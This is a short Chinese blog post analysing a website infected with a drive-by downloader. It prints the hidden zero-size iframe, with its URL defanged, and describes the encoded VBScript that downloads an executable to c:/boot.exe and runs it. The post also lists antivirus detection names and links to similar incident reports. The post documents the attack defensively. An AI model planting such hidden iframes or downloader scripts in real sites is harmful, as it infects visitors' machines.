一个被加入下载木马Trojan-Downloader.Win32.Delf.ajm的网站

简介: 一个被加入下载木马Trojan-Downloader.Win32.Delf.ajm的网站

该网站首页末被 加入

/--------
<iframe src=hxxp://www.z*z***yqr.com/z*l/wm.htm width=0 height=0 frameborder=0></iframe>
--------/

wm.htm 的内容为escape() 加密 的VBscrīpt 脚本 代码,功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 z*l.exe,保存为 c:/boot.exe,并利用Shell.Application 对象 的 ShellExecute 方法 来运行。

z*l.exe  Kaspersky 报为 Trojan-Downloader.Win32.Delf.ajm, 瑞星 报为Trojan.DL.Multi.wen。  


目录
打赏
0
1
1
0
57
分享
相关文章
刘三姐故乡的某网站被植入下载Worm.Win32.Delf.bse, Worm.Win32.Viking.ls等的代码
刘三姐故乡的某网站被植入下载Worm.Win32.Delf.bse, Worm.Win32.Viking.ls等的代码
某农业产品贸易网挂马Trojan.DL.Win32.Mnless.bes/Trojan-Dropper.Win32.Agent.xdu
某农业产品贸易网挂马Trojan.DL.Win32.Mnless.bes/Trojan-Dropper.Win32.Agent.xdu
遭遇 Trojan.DL.Agent.cjy、ltnward.exe、34E0AE22.dll 等
遭遇 Trojan.DL.Agent.cjy、ltnward.exe、34E0AE22.dll 等
01-15/某师范学院网站被挂马 sinze.exe/Virus.Win32.Delf.an
01-15/某师范学院网站被挂马 sinze.exe/Virus.Win32.Delf.an
01-12/某县政府网被加入下载木马 Trojan.Win32.Pakes 的代码(第2版)
01-12/某县政府网被加入下载木马 Trojan.Win32.Pakes 的代码(第2版)
某论坛上挂的东东,JPG图片 or 病毒Trojan.Win32.VB.azc?
某论坛上挂的东东,JPG图片 or 病毒Trojan.Win32.VB.azc?
某电力信息网挂马Worm.Win32.AutoRun,Trojan-Downloader.Win32.Losabel
某电力信息网挂马Worm.Win32.AutoRun,Trojan-Downloader.Win32.Losabel
数码相机存储卡居然带system.exe / Virus.Win32.Delf.an / Dropper.Gpigeon.fc
数码相机存储卡居然带system.exe / Virus.Win32.Delf.an / Dropper.Gpigeon.fc
某文学论坛被挂马 Worm.Win32.Agent.ipi/Trojan.Win32.Agent.avt
某文学论坛被挂马 Worm.Win32.Agent.ipi/Trojan.Win32.Agent.avt
遭遇Backdoor.Gpigeon.2007.ca,Trojan-PSW.Win32.QQRob.lg,Backdoor.Win32.Agent.bcn等1
遭遇Backdoor.Gpigeon.2007.ca,Trojan-PSW.Win32.QQRob.lg,Backdoor.Win32.Agent.bcn等1

热门文章

最新文章

AI助理

你好,我是AI助理

可以解答问题、推荐解决方案等